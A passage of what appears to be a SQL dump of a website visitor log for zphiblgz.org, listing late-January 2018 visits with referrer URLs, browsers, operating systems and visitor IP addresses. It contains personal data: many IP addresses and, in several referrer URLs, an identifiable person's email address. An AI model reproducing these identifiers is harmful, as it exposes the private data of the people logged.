ttps://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',2,0),(17921,'2018-01-30','https://zphiblgz.org','OrgProbe','Unknown','2.0.0','','86.145.81.218','000',2,0),(17922,'2018-01-30','https://zphiblgz.org','OrgProbe','Unknown','2.0.0','','51.9.23.191','000',2,0),(17923,'2018-01-30','https://zphiblgz.org','OrgProbe','Unknown','2.0.0','','82.34.52.143','000',2,0),(17924,'2018-01-30','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwjAn9fD5YDZAhWa2YMKHXOoA3EQjRwIBw&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw0m3XNbFboFE6IjANeoySGW&ust=1517439697146413','MSIE','Windows','11.0','','146.112.245.221','000',2,0),(17925,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(17926,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',1,0),(17927,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',1,0),(17928,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(17929,'2018-01-30','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','40.107.242.80','000',1,0),(17930,'2018-01-30','https://zphiblgz.org','Safari','iPhone','11.0','','66.210.225.114','000',1,0),(17931,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',2,0),(17932,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',1,0),(17933,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',2,0),(17934,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',2,0),(17935,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',1,0),(17936,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.11','000',2,0),(17937,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',3,0),(17938,'2018-01-30','https://zphiblgz.org','MSIE','Windows','11.0','','75.7.55.27','000',1,0),(17939,'2018-01-30','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.128.239.206','000',2,0),(17940,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.208','000',1,0),(17941,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',2,0),(17942,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.225','000',1,0),(17943,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.27','000',1,0),(17944,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.115','000',1,0),(17945,'2018-01-30','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.172','000',1,0),(17946,'2018-01-30','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.203','000',1,0),(17947,'2018-01-30','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.132','000',1,0),(17948,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.189','000',2,0),(17949,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','27.254.141.105','000',2,0),(17950,'2018-01-30','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',1,0),(17951,'2018-01-30','https://zphiblgz.org','Firefox','Windows','27.0','','62.157.53.64','000',2,0),(17952,'2018-01-30','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','81.161.59.17','000',2,0),(17953,'2018-01-30','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Firefox','Windows','40.1','','87.114.231.137','000',2,0),(17954,'2018-01-30','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Safari','iPhone','11.0','','173.239.223.4','000',1,0),(17955,'2018-01-30','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Firefox','Linux','52.0','','82.102.27.56','000',2,0),(17956,'2018-01-30','https://zphiblgz.org','MSIE','Windows','6.0','','161.69.31.20','000',2,0),(17957,'2018-01-30','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Safari','iPhone','7.0','','173.239.223.4','000',1,0),(17958,'2018-01-30','https://zphiblgz.org/mailbox/index.php?email=usama@imcokvv.com','Chrome','Android','41.0.2272.118','','5.62.39.21','000',1,0),(17959,'2018-01-30','https://zphiblgz.org','Android Browser','Android','602.1.50','','42.156.251.201','000',1,0),(17960,'2018-01-30','https://zphiblgz.org','Chrome','Windows','33.0.1750.117','','61.59.16.129','000',1,0),(17961,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',2,0),(17962,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.197','000',2,0),(17963,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',1,0),(17964,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',1,0),(17965,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(17966,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(17967,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(17968,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',1,0),(17969,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(17970,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',2,0),(17971,'2018-01-30','https://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.195','000',2,0),(17972,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',1,0),(17973,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',2,0),(17974,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(17975,'2018-01-30','https://zphiblgz.org','Python-urllib','Unknown','2.7','','207.47.45.73','000',2,0),(17976,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.85','000',1,0),(17977,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',1,0),(17978,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.149','000',1,0),(17979,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.214','000',2,0),(17980,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.228','000',1,0),(17981,'2018-01-30','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','71.121.203.114','000',8,0),(17982,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17983,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.144','000',2,0),(17984,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',2,0),(17985,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',2,0),(17986,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(17987,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(17988,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(17989,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',2,0),(17990,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(17991,'2018-01-30','https://zphiblgz.org','MSIE','Windows','8.0','','178.154.148.67','000',1,0),(17992,'2018-01-30','http://zphiblgz.org/index.php?op=check','MSIE','Windows','6.0','','73.231.103.153','000',2,0),(17993,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',2,0),(17994,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',2,0),(17995,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',2,0),(17996,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(17997,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',1,0),(17998,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',1,0),(17999,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',1,0),(18000,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',1,0),(18001,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',2,0),(18002,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',3,0),(18003,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',1,0),(18004,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.170','000',1,0),(18005,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.146','000',2,0),(18006,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.14','000',1,0),(18007,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.194','000',2,0),(18008,'2018-01-30','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=26&ved=0CCEQfjcXZGYmd0S0ZSWUZXcnJjZk1p&url=https%3A%2F%2Fzphiblgz.org%2Fmailbox%2Findex.php%3Femail%3Dusama%40imcokvv.com&ei=Z2JkRE1nUWJrYUJv&usg=AFQjZGhoR0pHckZhVkta','MSIE','Windows','11.0','','54.89.189.76','000',1,0),(18009,'2018-01-30','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','34.232.127.140','000',1,0),(18010,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.152','000',1,0),(18011,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','31.24.128.41','000',2,0),(18012,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',3,0),(18013,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(18014,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',1,0),(18015,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(18016,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(18017,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',1,0),(18018,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(18019,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',1,0),(18020,'2018-01-30','https://zphiblgz.org','Edge','Windows','12.246','','104.250.162.133','000',2,0),(18021,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',1,0),(18022,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(18023,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',1,0),(18024,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(18025,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.215','000',1,0),(18026,'2018-01-30','https://outlook.live.com/','Chrome','Windows','63.0.3239.132','','73.218.121.109','000',1,0),(18027,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(18028,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(18029,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(18030,'2018-01-30','https://zphiblgz.org','MSIE','Windows','11.0','','108.18.66.224','000',3,0),(18031,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(18032,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(18033,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',1,0),(18034,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',1,0),(18035,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(18036,'2018-01-30','https://zphiblgz.org','MSIE','Windows','8.0','','52.86.152.120','000',1,0),(18037,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.79','000',1,0),(18038,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.220','000',1,0),(18039,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(18040,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',2,0),(18041,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',1,0),(18042,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',1,0),(18043,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(18044,'2018-01-31','https://zphiblgz.org/mailbox','Firefox','Windows','3.6.8','','86.47.80.146','000',7,0),(18045,'2018-01-31','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',2,0),(18046,'2018-01-31','https://zphiblgz.org','SamsungBrowser','Android','5.2','','5.108.163.5','000',1,0),(18047,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.221','000',2,0),(18048,'2018-01-31','https://zphiblgz.org','Safari','Macintosh','5.1.3','','91.103.66.202','000',1,0),(18049,'2018-01-31','https://zphiblgz.org','Safari','Macintosh','5.1.3','','91.103.66.203','000',1,0),(18050,'2018-01-31','https://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.196','000',1,0),(18051,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.121.139.250','000',2,0),(18052,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.105','000',2,0),(18053,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.158','000',2,0),(18054,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.136','000',2,0),(18055,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.26','000',2,0),(18056,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.187','000',1,0),(18057,'2018-01-31','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.32','000',2,0),(18058,'2018-01-31','https://www.google.com/','Safari','iPhone','11.0','','73.250.198.184','000',2,0),(18059,'2018-01-31','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(18060,'2018-01-31','http://site.ru','Chrome','Windows','5.0.375.99','','159.253.33.227','000',2,0),(18061,'2018-01-31','https://zphiblgz.org','Chrome','Android','43.0.2357.93','','35.177.210.163','000',1,0),(18062,'2018-01-31','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.6.108','000',1,0),(18063,'2018-01-31','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAG&url=https%3A%2F%2Fzphiblgz.org%2Fmailbox%2Findex.php%3Femail%3Dtest%40testing.com&ei=YI5xWsHhOdmw3AXaugE&usg=AFQjCNGPOTXWVJxT_N3piR_Gz1-rQYPfvQ','MSIE','Windows','11.0','','66.102.6.106','000',1,0),(18064,'2018-01-31','https://www.google.com/','Chrome','Windows','63.0.3239.84','','66.102.6.106','000',1,0),(18065,'2018-01-31','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.136','000',1,0),(18066,'2018-01-31','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','183.90.36.221','000',1,0),(18067,'2018-01-31','https://zphiblgz.org','MSIE','Windows','6.0','','81.176.239.94','000',2,0),(18068,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.101','000',1,0),(18069,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.84','000',1,0),(18070,'2018-01-31','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1683.9A0mKgkAvDiezczn7SiiYmPXDhF9kgtA4923A_X5PaU.bc632b001c78d61c8ab02f296c37e0c8528afcee&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Y0ZzZmI3RTZxNFVXeGl2c01ERkZPWUVMb3h5VDVnSF9IWDY3TFRWaHRldyws&sign=d6af7c364322ed1a5cbe2a4733946cc1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.191.22','000',2,0),(18071,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.161','000',1,0),(18072,'2018-01-31','https://zphiblgz.org','Firefox','Windows','27.0','','62.157.63.134','000',2,0),(18073,'2018-01-31','https://zphiblgz.org','MSIE','Windows','6.0','','161.69.31.20','000',2,0),(18074,'2018-01-31','https://zphiblgz.org','Chrome','Android','44.0.2403.63','','35.177.192.212','000',1,0),(18075,'2018-01-31','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(18076,'2018-01-31','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(18077,'2018-01-31','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1683.6CTbq2g5IP5BKU0C5qijINzfRWimE9HA2fVkpxHht9o.5d592f7d49a52da228d533ea69fbb676c52fff3e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZFlyaHpTN1pXY0xWWS1vRGdoazVkTUNicjJVTmpvQXlITzNRdl9GV01Hdyws&sign=735dac2666f198f7969a9be74e153f25&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','52.58.192.209','000',2,0),(18078,'2018-01-31','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','97.74.230.104','000',1,0),(18079,'2018-01-31','https://zphiblgz.org','Firefox','Windows','52.0','','192.198.80.227','000',4,0),(18080,'2018-01-31','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(18081,'2018-01-31','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(18082,'2018-01-31','http://zphiblgz.org/','Opera','Windows','12.15','','195.22.125.122','000',3,0),(18083,'2018-01-31','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1683.a60ymVqnlTPxTDcL45u7KymVMnjgy_DSnmMReJfuyqM.e88e278b28525ef4360269aa15078fcfba97bae5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WHQ4blNrUjFsNmtEUEdfMnhfUjQ4U21vbDA0VHZqS25Bc0FpbzJnSUVfdyws&sign=9c5782768c5eb73d5b4d29dab2c9ad26&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.119.241','000',2,0),(18084,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',2,0),(18085,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(18086,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',2,0),(18087,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',1,0),(18088,'2018-01-31','https://zphiblgz.org','MSIE','Windows','11.0','','51.39.216.143','000',1,0),(18089,'2018-01-31','https://zphiblgz.org','Go--client','Unknown','2.0','','107.22.114.80','000',1,0),(18090,'2018-01-31','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1683._4nr7LKoW2E9YIQT_XM1yV0vDjRUt1UN4a8go4C1Cgo.e6f28488a85d2a93e9151492fbc5686137216773&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dGNQNkxIYXZkSkxVMTgyN3kyU1Rqb2ItcW5sNVczQTdoemExWVl6ODdxZyws&sign=f49410d0c666895aba72436b520da9ca&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.219.21','000',2,0),(18091,'2018-01-31','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1683.UjIEtL7a7KXKsY2_EKaSLWXBTt5Cm7JdC-os6nNOtwc.e669c463752ce959eca0ea7b5907080942eec697&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RlB6dlZkaEtVeGhUZ2tEcVpiQVFCQUo4aFk5clJTeTNkSUZGbUJTSWQtZyws&sign=09b1036b02c0ac3437e24e8dfc0f990a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','107.170.241.66','000',2,0),(18092,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',2,0),(18093,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',2,0),(18094,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',3,0),(18095,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',3,0),(18096,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(18097,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',3,0),(18098,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',1,0),(18099,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',1,0),(18100,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',3,0),(18101,'2018-01-31','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(18102,'2018-01-31','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','104.236.63.51','000',2,0),(18103,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(18104,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',2,0),(18105,'2018-01-31','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','40.77.179.51','000',1,0),(18106,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.225','000',1,0),(18107,'2018-01-31','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(18108,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',2,0),(18109,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',3,0),(18110,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',1,0),(18111,'2018-01-31','http://site.ru','Chrome','Windows','5.0.375.99','','185.43.77.88','000',2,0),(18112,'2018-01-31','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(18113,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',3,0),(18114,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',1,0),(18115,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(18116,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.35','000',1,0),(18117,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',2,0),(18118,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',4,0),(18119,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',2,0),(18120,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.115','000',1,0),(18121,'2018-01-31','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(18122,'2018-01-31','https://zphiblgz.org/','Firefox','Windows','58.0','','130.0.26.226','000',1,0),(18123,'2018-01-31','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(18124,'2018-01-31','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(18125,'2018-01-31','https://zphiblgz.org','Firefox','Windows','58.0','','192.198.80.227','000',1,0),(18126,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',1,0),(18127,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',1,0),(18128,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(18129,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(18130,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',2,0),(18131,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',3,0),(18132,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.54','000',1,0),(18133,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',2,0),(18134,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.91','000',2,0),(18135,'2018-01-31','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','50.225.39.88','000',6,0),(18136,'2018-01-31','https://zphiblgz.org','MSIE','Windows','11.0','','112.65.223.12','000',1,0),(18137,'2018-01-31','74.220.219.51','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(18138,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.146','000',1,0),(18139,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.197','000',1,0),(18140,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.208','000',1,0),(18141,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.212','000',2,0),(18142,'2018-01-31','https://zphiblgz.org','Safari','iPhone','9.0','','110.177.79.204','000',1,0),(18143,'2018-01-31','https://zphiblgz.org','Safari','iPhone','9.0','','124.88.64.207','000',1,0),(18144,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',1,0),(18145,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',1,0),(18146,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',4,0),(18147,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(18148,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.168','000',2,0),(18149,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',1,0),(18150,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.133','000',2,0),(18151,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.50','000',1,0),(18152,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.48','000',2,0),(18153,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.89','000',1,0),(18154,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.114','000',1,0),(18155,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.220','000',1,0),(18156,'2018-01-31','https://zphiblgz.org','Firefox','Linux','58.0','','71.121.222.193','000',1,0),(18157,'2018-01-31','h